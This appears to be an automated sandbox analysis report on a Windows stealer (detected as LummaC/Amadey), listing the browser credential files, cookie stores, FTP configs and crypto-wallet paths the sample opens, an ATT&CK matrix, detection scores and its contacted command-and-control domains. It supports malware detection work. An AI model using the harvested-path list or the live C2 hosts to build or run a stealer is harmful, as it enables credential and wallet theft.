Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Yara match	File source: 00000005.00000003.2171437593.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1944581923.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2167082560.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2170689268.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1945137518.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZX2M0AXZ56.exe PID: 3804, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: ZX2M0AXZ56.exe PID: 3804, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	44 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	861 Security Software Discovery	Remote Desktop Protocol	4 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	44 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ZX2M0AXZ56.exe	57%	Virustotal		Browse
ZX2M0AXZ56.exe	65%	ReversingLabs	Win32.Trojan.Amadey
ZX2M0AXZ56.exe	100%	Avira	TR/Crypt.TPM.Gen
ZX2M0AXZ56.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
rebuildeso.buzz	0%	Avira URL Cloud	safe
appliacnesot.buzz	0%	Avira URL Cloud	safe
scentniej.buzz	0%	Avira URL Cloud	safe
https://mindhandru.buzz/apieed0	0%	Avira URL Cloud	safe
https://mindhandru.buzz/	0%	Avira URL Cloud	safe
https://mindhandru.buzz/2	0%	Avira URL Cloud	safe
screwamusresz.buzz	0%	Avira URL Cloud	safe
inherineau.buzz	0%	Avira URL Cloud	safe
https://mindhandru.buzz/api.	100%	Avira URL Cloud	malware
cashfuzysao.buzz	0%	Avira URL Cloud	safe
prisonyfork.buzz	0%	Avira URL Cloud	safe
hummskitnj.buzz	0%	Avira URL Cloud	safe
https://mindhandru.buzz/apine	0%	Avira URL Cloud	safe
https://mindhandru.buzz/api	100%	Avira URL Cloud	malware
https://mindhandru.buzz/P	0%	Avira URL Cloud	safe
mindhandru.buzz	0%	Avira URL Cloud	safe
https://mindhandru.buzz/apiW	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mindhandru.buzz	104.21.11.101	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	true	Avira URL Cloud: safe	unknown
rebuildeso.buzz	true	Avira URL Cloud: safe	unknown
appliacnesot.buzz	true	Avira URL Cloud: safe	unknown
screwamusresz.buzz	true	Avira URL Cloud: safe	unknown
cashfuzysao.buzz	true	Avira URL Cloud: safe	unknown
inherineau.buzz	true	Avira URL Cloud: safe	unknown
prisonyfork.buzz	true	Avira URL Cloud: safe	unknown
hummskitnj.buzz	true	Avira URL Cloud: safe	unknown
mindhandru.buzz	true	Avira URL Cloud: safe	unknown
https://mindhandru.buzz/api	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0	ZX2M0AXZ56.exe, 00000005.00000003.1949796098.0000000005315000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/2	ZX2M0AXZ56.exe, 00000005.00000002.2235693260.0000000005304000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.2223846655.0000000005304000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mindhandru.buzz/apieed0	ZX2M0AXZ56.exe, 00000005.00000003.1885226655.000000000531A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	ZX2M0AXZ56.exe, 00000005.00000003.1949796098.0000000005315000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/	ZX2M0AXZ56.exe, 00000005.00000002.2235693260.0000000005304000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.2223846655.0000000005304000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1404995967.0000000000986000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1404897117.0000000000975000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz/api.	ZX2M0AXZ56.exe, 00000005.00000003.1944890459.000000000531A000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1944689197.0000000005313000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	ZX2M0AXZ56.exe, 00000005.00000003.1946133935.000000000534F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	ZX2M0AXZ56.exe, 00000005.00000003.1946133935.000000000534F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	ZX2M0AXZ56.exe, 00000005.00000003.1948129242.000000000542C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	ZX2M0AXZ56.exe, 00000005.00000003.1405615352.000000000535C000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405793252.0000000005359000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1405718433.0000000005359000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	ZX2M0AXZ56.exe, 00000005.00000003.2209623789.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.2194882193.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1944581923.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.2167082560.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1404995967.0000000000986000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1404897117.0000000000975000.00000004.00000020.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1945137518.00000000009B7000.00000004.00000020.00020000.00000000.sdmp	false		high
